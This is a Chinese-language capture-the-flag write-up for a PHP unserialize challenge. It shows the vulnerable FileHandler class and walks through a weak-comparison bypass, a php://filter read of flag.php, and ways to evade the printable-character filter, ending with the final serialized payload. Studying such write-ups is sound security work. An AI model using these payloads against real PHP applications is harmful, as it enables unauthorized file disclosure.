<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
看到这么长的代码先不要慌,先看最后:
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
先通过get方式获得字符串str,然后通过is_valid函数判断,就来看看is_valid函数:
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
ord函数是返回字符的 ASCII码, 通过循环的方式确保str的每个字符的ASCII码值在32至125之间,满足就对str进行反序列化,
检测不通过直接报错。
然后我们看一下
FileHandler的类,和
魔法方法:
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
__construct()
魔术方法在每次创建新对象时调用,我们传入对象时已经创建好,所以不需要调用
__construct()
方法,而
__destruct
魔术方法在对象销毁时执行,
因此不需要管
__construct(),只需管
__destruct()。
如果op强类型等于2就会将其覆盖为1,然后将content置空,并调用process()函数,接着看process()函数:
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
如果op弱等于1,就调用write()函数,若op弱等于2就调用read()函数并用output()函数处理read函数处理后的值,若op不等于2和3,就直接用output输出Bad Hacker!
再看看
write
()函数:
function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
在存在filename,content变量的情况下,如果content变量长度大于100就输出
Too long!如果用
file_put_contents函数成功打开fliename和content就输出
Successful!否则输出
Failed!(此处看到
file_put_contents函数就能想到用php伪协议绕过它
)
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
同样若filename存在就以
file_get_contents函数打开(也能用伪协议)。
__destruct()魔术方法中,op==="2"是强比较,而process()使用的是弱比较op=="2",可以通过弱类型绕过。
绕过方法:op=2,这里的2是整数int类型,op=2时,op==="2"为false,op=="2"为true,就能顺利执行到read()函数。
read方法中,使用
file_get_contents()
函数来读取属性filename路径的文件。根据源码开头有包含:
include(
"flag.php"
),所以此处能
使用PHP伪协议读取flag.php
构建序列化内容:
<?php
class FileHandler {
protected $op = 2;
protected $filename = 'php://filter/read=convert.base64-encode/resource=flag.php';
protected $content;
}
echo serialize(new FileHandler);
?>
得到:
O:11:"FileHandler":3:{s:5:" * op";i:2;s:11:" * filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:10:" * content";N;}
传入后 发现显示:
[Result]:
Bad Hacker!
为什么呢?
原因是
is_valid()函数规定字符的ASCII码必须是32-125,而protected属性在序列化后会出现不可见字符\00*\00,转化为ASCII码不符合要求。
绕过方法:
①PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过(可以在response headers中的x-powered-by中看php的版本)
②private属性序列化的时候会引入两个\x00,注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到,甚至导致截断,但是url编码后就可以看得很清楚了。同理,protected属性会引入\x00*\x00。此时,为了更加方便进行反序列化Payload的传输与显示,我们可以在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。
最后将上面的protected改为public,得到:
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
在源码里得到flag